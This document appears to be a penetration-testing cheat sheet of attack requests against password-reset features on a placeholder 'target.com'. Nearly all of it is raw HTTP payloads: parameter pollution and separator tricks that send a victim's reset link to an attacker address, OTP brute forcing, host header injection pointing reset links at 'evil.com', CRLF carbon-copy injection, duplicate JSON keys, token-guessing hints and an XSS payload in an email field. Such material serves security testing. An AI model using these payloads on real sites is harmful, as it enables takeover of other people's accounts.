Some common bugs in the forgot password / reset password functionality
- Parameter pollution
POST /reset HTTP/1.1
Host: target.com
...
[email protected]&[email protected]
- Bruteforce the OTP code
POST /reset HTTP/1.1
Host: target.com
...
[email protected]&code=$123456$
- Host header Injection
POST /reset HTTP/1.1
Host: target.com
...
[email protected]
to
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...
[email protected]
And the victim will receive the reset link with evil.com
- Using separator in value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
[email protected],[email protected]
POST /reset HTTP/1.1
Host: target.com
...
[email protected]%[email protected]
POST /reset HTTP/1.1
Host: target.com
...
[email protected]|[email protected]
POST /reset HTTP/1.1
Host: target.com
...
[email protected]%[email protected]
- No domain in value of the paramter
POST /reset HTTP/1.1
Host: target.com
...
email=victim
- No TLD in value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail
- Using carbon copy
POST /reset HTTP/1.1
Host: target.com
...
[email protected]%0a%0dcc:[email protected]
- If there is JSON data in body requests, add comma
POST /newaccount HTTP/1.1
Host: target.com
...
{"email":"[email protected]","[email protected]","token":"xxxxxxxxxx"}
- Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
- Try Cross-Site Scripting (XSS) in the form
Sometimes the email is reflected in the forgot password page, try to use XSS payload
"<svg/onload=alert(1)>"@gmail.com